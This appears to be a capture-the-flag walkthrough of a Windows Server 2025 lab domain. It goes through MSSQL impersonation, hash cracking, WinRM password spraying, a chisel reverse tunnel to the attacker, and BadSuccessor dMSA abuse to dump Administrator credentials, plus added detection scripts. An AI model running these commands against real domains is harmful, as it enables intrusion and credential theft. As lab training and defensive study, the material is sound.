Goal: Start from low MSSQL creds, pivot via impersonation and web hash crack, reuse to WinRM, map AD with BloodHound, then abuse Bad Successor (dMSA) on Server 2025 to dump NTDS and get Administrator.
Quick checklist
- Add hosts entry for the target
- Fix Kerberos clock skew
- Enumerate MSSQL and impersonate appdev
- Extract admin hash from app DB and crack
- Password spray to WinRM and get shell as adam.scott
- Run SharpHound and analyze in BloodHound
- Confirm OU write on Staff and Bad Successor path
- Create dMSA, request ticket, dump NTDS
- Log in as Administrator and grab root flag
1) External enumeration
Nmap essentials
sudo nmap -p- -Pn -sCV 10.129.xx.xx

Findings:
- 80/tcp IIS 10
- 1433/tcp MSSQL 2022
- 5985/tcp WinRM
- Clock skew ~+7h (breaks Kerberos)
Fix clock skew
- Option A (temporary): run commands with faketime
- Option B (recommended): sync to target with ADUtilities fixtime script
sudo ntpdate 10.10.11.95   # or run fixtime.sh
Refs: fixtime.sh · ADUtilities
Hosts entry
echo "10.129.xx.xx eighteen.htb DC01.eighteen.htb" | sudo tee -a /etc/hosts
Web recon
Visit http://eighteen.htb and sign up as a normal user.

An admin area exists at /dashboard, but it is restricted, so there is not much to see here yet.
2) MSSQL: logins and impersonation
Starting creds: kevin / iNa2we6haRj2gaw!
List modules and logins:
sudo nxc mssql -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -L
sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_logins
---
└─$ sudo nxc mssql -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -L
LOW PRIVILEGE MODULES
ENUMERATION
[*] enum_impersonate Enumerate users with impersonation privileges
[*] enum_links Enumerate linked SQL Servers and their login configurations.
[*] enum_logins Enumerate SQL Server logins (SQL, Domain, Local users)
PRIVILEGE_ESCALATION
[*] enable_cmdshell Enable or disable xp_cmdshell in MSSQL Server
[*] exec_on_link Execute commands on a SQL Server linked server
[*] link_enable_cmdshell Enable or disable xp_cmdshell on a linked MSSQL server
[*] link_xpcmd Run xp_cmdshell commands on a linked SQL server
[*] mssql_coerce Execute arbitrary SQL commands on the target MSSQL server
[*] mssql_priv Enumerate and exploit MSSQL privileges
HIGH PRIVILEGE MODULES (requires admin privs)
ENUMERATION
[*] test_connection Pings a host
CREDENTIAL_DUMPING
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
PRIVILEGE_ESCALATION
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
└─$ sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_logins
MSSQL 10.129.xx.xx 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.xx.xx 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
ENUM_LOGINS 10.129.xx.xx 1433 DC01 [*] Enumerated logins
ENUM_LOGINS 10.129.xx.xx 1433 DC01 Login Name Type Status
ENUM_LOGINS 10.129.xx.xx 1433 DC01 ---------- ---- ------
ENUM_LOGINS 10.129.xx.xx 1433 DC01 appdev SQL User ENABLED
ENUM_LOGINS 10.129.xx.xx 1433 DC01 kevin SQL User ENABLED
ENUM_LOGINS 10.129.xx.xx 1433 DC01 sa SQL User ENABLED
We have three SQL logins: appdev, kevin and sa.
Next, check which of them kevin can impersonate:
sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_impersonate
---
└─$ sudo nxc mssql 10.129.xx.xx -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_impersonate
MSSQL 10.129.xx.xx 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.xx.xx 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
ENUM_IMP... 10.129.xx.xx 1433 DC01 [+] Users with impersonation rights:
ENUM_IMP... 10.129.xx.xx 1433 DC01 [*] - appdev
Connect and assume appdev:
impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.129.xx.xx
# in SQL shell
exec_as_login appdev

└─$ impacket-mssqlclient eighteen.htb/kevin:'iNa2we6haRj2gaw!'@10.129.xx.xx
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)>
Enumerate DBs and dump users:
enum_db
USE financial_planner;
SELECT * FROM INFORMATION_SCHEMA.TABLES;
SELECT * FROM users;
SQL (appdev appdev@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
SQL (appdev appdev@master)> USE financial_planner;
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)> SELECT * FROM INFORMATION_SCHEMA.TABLES;
[%] SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
----------------- ------------ ----------- ----------
financial_planner dbo users b'BASE TABLE'
financial_planner dbo incomes b'BASE TABLE'
financial_planner dbo expenses b'BASE TABLE'
financial_planner dbo allocations b'BASE TABLE'
financial_planner dbo analytics b'BASE TABLE'
financial_planner dbo visits b'BASE TABLE'
SQL (appdev appdev@financial_planner)> SELECT * FROM users;
[%] SELECT * FROM users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
With the financial_planner database identified, we enumerated it and found exactly what we were after: the admin account's password hash.
pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
Tip: the users table holds an admin account with a PBKDF2-SHA256 (Werkzeug) hash.
3) Crack Werkzeug PBKDF2‑SHA256 with Hashcat
Convert the hash to Hashcat's generic PBKDF2-HMAC-SHA256 format (mode 10900), save it to hash.txt, and crack it:
python3 - << 'PY' > hash.txt
import base64, binascii
# Werkzeug format: pbkdf2:sha256:<iterations>$<salt>$<hexdigest>
h = 'pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133'.split('$')
iterations = h[0].split(':')[2]
# hashcat -m 10900 expects sha256:<iterations>:<base64 salt>:<base64 digest>
print(f"sha256:{iterations}:{base64.b64encode(h[1].encode()).decode()}:{base64.b64encode(binascii.unhexlify(h[2])).decode()}")
PY
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt --show
Recovered: admin:iloveyou1
Let's use these credentials to log back in to the website and check the Admin section for anything useful.

Refs: 0xdf note · Hashcat thread
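The conversion above works for this one hash; the following is an added example (not part of the original writeup) that generalises it: it parses any Werkzeug-style `pbkdf2:sha256:<iterations>$<salt>$<hexdigest>` string, emits the hashcat mode 10900 line, and also shows how the application itself verifies a password with the same PBKDF2 parameters. The `make_werkzeug_hash` helper, the salt `c0nstructedSalt0` and the test password are constructed for the demo; only `PAGE_HASH` comes from the writeup.

```python
# Added example: parse/convert Werkzeug PBKDF2 hashes and verify a candidate
# password offline. Not part of the original writeup.
import base64
import binascii
import hashlib
import hmac

# Hash recovered from the users table in the writeup.
PAGE_HASH = ("pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
             "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133")


def parse_werkzeug(stored: str) -> dict:
    """Split a Werkzeug pbkdf2 hash into algorithm, iterations, salt and digest."""
    method, salt, hexdigest = stored.split("$", 2)
    parts = method.split(":")  # e.g. ["pbkdf2", "sha256", "600000"]
    if len(parts) != 3 or parts[0] != "pbkdf2":
        raise ValueError(f"unsupported hash format: {method}")
    return {
        "algo": parts[1],
        "iterations": int(parts[2]),
        "salt": salt,                           # stored as an ASCII string
        "digest": binascii.unhexlify(hexdigest),
    }


def to_hashcat_10900(stored: str) -> str:
    """Render as 'sha256:<iter>:<b64 salt>:<b64 digest>' (hashcat mode 10900)."""
    p = parse_werkzeug(stored)
    if p["algo"] != "sha256":
        raise ValueError("mode 10900 is PBKDF2-HMAC-SHA256 only")
    return ":".join([
        "sha256",
        str(p["iterations"]),
        base64.b64encode(p["salt"].encode()).decode(),
        base64.b64encode(p["digest"]).decode(),
    ])


def make_werkzeug_hash(password: str, salt: str, iterations: int = 600000) -> str:
    """Build a hash in the same format: PBKDF2-HMAC-SHA256 over the ASCII salt."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2:sha256:{iterations}${salt}${dk.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    """Constant-time check of a candidate password against a stored hash."""
    p = parse_werkzeug(stored)
    dk = hashlib.pbkdf2_hmac(p["algo"], candidate.encode(),
                             p["salt"].encode(), p["iterations"])
    return hmac.compare_digest(dk, p["digest"])


if __name__ == "__main__":
    print(to_hashcat_10900(PAGE_HASH))
    # Constructed sample with a low iteration count so the demo runs quickly.
    sample = make_werkzeug_hash("correct horse", "c0nstructedSalt0", iterations=1000)
    print(verify_password(sample, "correct horse"), verify_password(sample, "wrong"))
```

The takeaway for defenders is visible in `verify_password`: 600,000 PBKDF2 rounds slow each guess, but a single-word password from a common list still falls to an offline dictionary attack, so the stored hash only buys time against weak passwords, not safety.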
4) Spray to WinRM and get a foothold
RID brute for users:
sudo nxc mssql DC01.eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
Create users.txt and spray the cracked password:
sudo nxc winrm DC01.eighteen.htb -u users.txt -p 'iloveyou1' --no-bruteforce
└─$ sudo nxc winrm DC01.eighteen.htb -u users.txt -p 'iloveyou1' --no-bruteforce
WINRM 10.129.xx.xx 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\Administrator:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\mssqlsvc:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.129.xx.xx 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
Hit: eighteen.htb\adam.scott
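The spray above has the signature a defender should look for: one source trying a single password against many accounts within seconds, followed by one success. The following added example (not part of the original writeup) implements that detection over constructed Windows logon events, modelled as dicts with the fields a 4625 (failed logon) or 4624 (successful logon) record would carry. The source address `10.10.16.5`, the timestamps and the benign noise from `10.10.20.7` are constructed; the account names mirror the spray output.

```python
# Added example: password-spray detector over constructed 4624/4625 events.
# Not part of the original writeup.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (field names are simplified from the real events).
EVENTS = [
    {"time": "2025-10-29T05:40:01", "id": 4625, "user": "Administrator", "src": "10.10.16.5"},
    {"time": "2025-10-29T05:40:01", "id": 4625, "user": "mssqlsvc", "src": "10.10.16.5"},
    {"time": "2025-10-29T05:40:02", "id": 4625, "user": "jamie.dunn", "src": "10.10.16.5"},
    {"time": "2025-10-29T05:40:02", "id": 4625, "user": "jane.smith", "src": "10.10.16.5"},
    {"time": "2025-10-29T05:40:03", "id": 4625, "user": "alice.jones", "src": "10.10.16.5"},
    {"time": "2025-10-29T05:40:03", "id": 4624, "user": "adam.scott", "src": "10.10.16.5"},
    # Benign noise: one user mistyping their own password twice from another host.
    {"time": "2025-10-29T05:41:10", "id": 4625, "user": "jane.smith", "src": "10.10.20.7"},
    {"time": "2025-10-29T05:41:30", "id": 4625, "user": "jane.smith", "src": "10.10.20.7"},
]

WINDOW = timedelta(minutes=5)
MIN_DISTINCT_USERS = 4  # threshold is a tuning choice, not a standard


def detect_spray(events, window=WINDOW, min_users=MIN_DISTINCT_USERS):
    """Return {source: {"users": [...], "succeeded": [...]}} for every source that
    failed against at least `min_users` distinct accounts inside `window`, with any
    account that then logged on successfully from that source in the same window."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_src[ev["src"]].append((datetime.fromisoformat(ev["time"]), ev))

    alerts = {}
    for src, items in by_src.items():
        failures = [(t, e["user"]) for t, e in items if e["id"] == 4625]
        # Slide a window over the time-ordered failures, counting distinct accounts.
        for i, (start, _) in enumerate(failures):
            users = {u for t, u in failures[i:] if t - start <= window}
            if len(users) >= min_users:
                succeeded = sorted({e["user"] for t, e in items
                                    if e["id"] == 4624 and start <= t <= start + window})
                alerts[src] = {"users": sorted(users), "succeeded": succeeded}
                break
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(EVENTS).items():
        print(f"spray from {src}: {len(info['users'])} accounts, "
              f"successful logon as {info['succeeded']}")
```

The distinct-account count is what separates a spray from a user fumbling their own password: the second source fails twice against one account and is never reported, while the first source trips the rule and the later 4624 from the same address turns it into a confirmed compromise rather than just an attempt.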
Get a shell:
evil-winrm -i dc01.eighteen.htb -u adam.scott -p iloveyou1

User flag:
Get-Content C:\Users\adam.scott\Desktop\user.txt

and there we got the sweet flag.
5) Privilege escalation and root flag
First we check which privileges adam.scott holds and what we can run.
*Evil-WinRM* PS C:\Users\adam.scott\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
So adam.scott can add workstations to the domain and increase a process working set. These privileges point toward Resource Based Constrained Delegation (RBCD); more precisely, a Bad Successor attack seems promising.
Before moving further, since the machine exposes few ports, we upload chisel so we can reach all the services running on it.
6) uploading chisel
*Evil-WinRM* PS C:\Users\adam.scott\Documents> upload chisel.exe
Next, we start chisel in server mode on our machine, and in client mode on the target.
chisel server --reverse --socks5 -p 6000
Start-Process -FilePath C:\Users\adam.scott\Documents\chisel.exe -ArgumentList "client","10.10.16.x:6000","R:socks"
With the basic setup for the Bad Successor attack in place, we can proceed. Chisel is used so that the ticket requests later on (Impacket's getST.py) can reach the DC through the SOCKS tunnel. The BadSuccessor.exe binary can be downloaded from here.
Next, we upload the binary.
evil-winrm-py PS C:\Users\adam.scott\Documents> upload BadSuccessor.exe .
Then identify the target Organisational Units (OUs).
adam.scott (via the IT group) can write to OU=Staff, and the environment is Windows 11 / Server 2025 (Build 26100). This suggests the Bad Successor (dMSA) path.
Refs: Intrucept · Akamai · CVE‑2025‑33073
Validate permissions:
evil-winrm-py PS C:\Users\adam.scott\Documents> ./BadSuccessor.exe find
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] OUs you have write access to:
-> OU=Domain Controllers,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll
-> OU=Staff,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll, CreateChild
7) Priv‑esc via Bad Successor (dMSA)
Create the malicious account.
Create a dMSA linked to Administrator and grant adam.scott the right to retrieve its password (PowerShell line continuation uses a backtick):
.\BadSuccessor.exe escalate `
  -targetOU "OU=Staff,DC=eighteen,DC=htb" `
  -dmsa "BAD_DMSA" `
  -targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" `
  -dnshostname "BAD_DMSA" `
  -user "adam.scott" `
  -dc-ip 10.10.11.95
evil-winrm-py PS C:\Users\adam.scott\Documents> .\BadSuccessor.exe escalate -targetOU "OU=Staff,DC=eighteen,DC=htb" -dmsa BAD_DMSA -targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" -dnshostname BAD_DMSA -user adam.scott -dc-ip 10.10.11.95
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] Creating dMSA object...
[*] Inheriting target user privileges
-> msDS-ManagedAccountPrecededByLink = CN=Administrator,CN=Users,DC=eighteen,DC=htb
-> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
-> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute
[+] Created dMSA 'BAD_DMSA' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' (DC: 10.10.11.95)
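The tool output above lists exactly the writes a domain's audit log can catch: a new dMSA object, then `msDS-ManagedAccountPrecededByLink` pointed at Administrator, `msDS-DelegatedMSAState` set to 2 and `msDS-GroupMSAMembership` granting a low-privileged user password retrieval. The following added example (not part of the original writeup or of BadSuccessor) triages constructed Directory Service change events for those writes. It models Windows event 5137 (object created) and 5136 (object modified) as dicts using the real field names `SubjectUserName`, `ObjectDN`, `ObjectClass`, `AttributeLDAPDisplayName` and `AttributeValue`; the sample values, the `svc_migration` account and the `OU=Servers` objects are constructed, and the dMSA object class name `msDS-DelegatedManagedServiceAccount` is an assumption.

```python
# Added example: triage constructed 5136/5137 events for dMSA abuse indicators.
# Not part of the original writeup.

# Accounts whose "successor" dMSA would inherit Domain Admin rights.
PRIVILEGED_DNS = {"CN=Administrator,CN=Users,DC=eighteen,DC=htb"}
DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"  # assumed class name, see lead-in
WATCHED_ATTRS = {
    "msDS-ManagedAccountPrecededByLink",  # "this dMSA succeeds account X"
    "msDS-DelegatedMSAState",             # 2 = migration marked complete
    "msDS-GroupMSAMembership",            # who may retrieve the managed password
}

# Constructed sample events; field names follow the real 5136/5137 records.
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=BAD_DMSA,OU=Staff,DC=eighteen,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=BAD_DMSA,OU=Staff,DC=eighteen,DC=htb",
     "AttributeLDAPDisplayName": "msDS-ManagedAccountPrecededByLink",
     "AttributeValue": "CN=Administrator,CN=Users,DC=eighteen,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=BAD_DMSA,OU=Staff,DC=eighteen,DC=htb",
     "AttributeLDAPDisplayName": "msDS-DelegatedMSAState", "AttributeValue": "2"},
    # Benign: a planned migration done by the account that normally does it.
    {"EventID": 5137, "SubjectUserName": "svc_migration", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=web01_dmsa,OU=Servers,DC=eighteen,DC=htb"},
    {"EventID": 5136, "SubjectUserName": "svc_migration", "ObjectClass": DMSA_CLASS,
     "ObjectDN": "CN=web01_dmsa,OU=Servers,DC=eighteen,DC=htb",
     "AttributeLDAPDisplayName": "msDS-ManagedAccountPrecededByLink",
     "AttributeValue": "CN=svc_web01,OU=Servers,DC=eighteen,DC=htb"},
    # Unrelated attribute change on a user object: must be ignored.
    {"EventID": 5136, "SubjectUserName": "adam.scott", "ObjectClass": "user",
     "ObjectDN": "CN=adam.scott,OU=Staff,DC=eighteen,DC=htb",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "x"},
]


def triage(events, privileged_dns=PRIVILEGED_DNS, trusted_subjects=frozenset()):
    """Return (severity, subject, objectDN, reason) tuples for dMSA creations and
    watched attribute writes by principals outside `trusted_subjects`. Linking a
    dMSA to a DN in `privileged_dns` is rated high; everything else medium."""
    findings = []
    for ev in events:
        if ev.get("ObjectClass") != DMSA_CLASS or ev["SubjectUserName"] in trusted_subjects:
            continue
        subj, dn = ev["SubjectUserName"], ev["ObjectDN"]
        if ev["EventID"] == 5137:
            findings.append(("medium", subj, dn, "dMSA created by a non-allowlisted principal"))
        elif ev["EventID"] == 5136:
            attr = ev.get("AttributeLDAPDisplayName")
            if attr not in WATCHED_ATTRS:
                continue
            val = ev.get("AttributeValue", "")
            high = attr == "msDS-ManagedAccountPrecededByLink" and val in privileged_dns
            findings.append(("high" if high else "medium", subj, dn, f"{attr} set to {val}"))
    return findings


if __name__ == "__main__":
    for sev, subj, dn, why in triage(SAMPLE_EVENTS, trusted_subjects={"svc_migration"}):
        print(f"[{sev}] {subj} on {dn}: {why}")
```

Two practical notes: 5136 events only appear when the "Audit Directory Service Changes" subcategory is enabled and the OU carries a SACL for property writes, so the rule is silent on an unaudited OU; and the real events arrive as XML, so a production version would parse the EventData elements into the same dict shape before calling `triage`.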
And now we move to the final phase of extracting the ticket.
For this step, the latest Fortra Impacket from the main branch is required, since it supports the -dmsa flag.
First, we get a TGT for adam.scott for Kerberos authentication.
proxychains4 getTGT.py eighteen.htb/adam.scott:'iloveyou1'
[proxychains] config file found: /etc/proxychains4.conf
export KRB5CCNAME=adam.scott.ccache
Then we impersonate BAD_DMSA through adam.scott and obtain a TGT (krbtgt ticket) for BAD_DMSA:
proxychains4 getST.py 'eighteen.htb/adam.scott':'iloveyou1' -impersonate 'BAD_DMSA$' -self -dmsa -dc-ip 10.10.11.95
Now, using this ticket, we request a service ticket for cifs/dc01.eighteen.htb in order to dump credentials.
export KRB5CCNAME='BAD_DMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache'
proxychains4 getST.py -k -no-pass -spn cifs/dc01.eighteen.htb -dc-ip 10.10.11.95 'eighteen.htb/BAD_DMSA$'
And finally, dump Administrator’s credentials using the service ticket.
export KRB5CCNAME='BAD_DMSA$@cifs_dc01.eighteen.htb@EIGHTEEN.HTB.ccache'
proxychains4 secretsdump.py -k -no-pass -just-dc-user administrator -dc-ip 10.10.11.95 -target-ip 10.10.11.95 dc01.eighteen.htb
This reveals the admin hash.
ROOT FLAG
Finally, with Administrator's hash in hand, we can log in and grab the root flag.

And there we have it.


Lessons learned
- MSSQL impersonation + app DB exposure = quick credential leverage
- Password reuse enables easy lateral movement to WinRM
- Server 2025 dMSA + OU write can be catastrophic (Bad Successor)
References: fixtime.sh · ADUtilities · 0xdf · Hashcat forum · Intrucept · Akamai · CVE
HAPPY HACKING!!!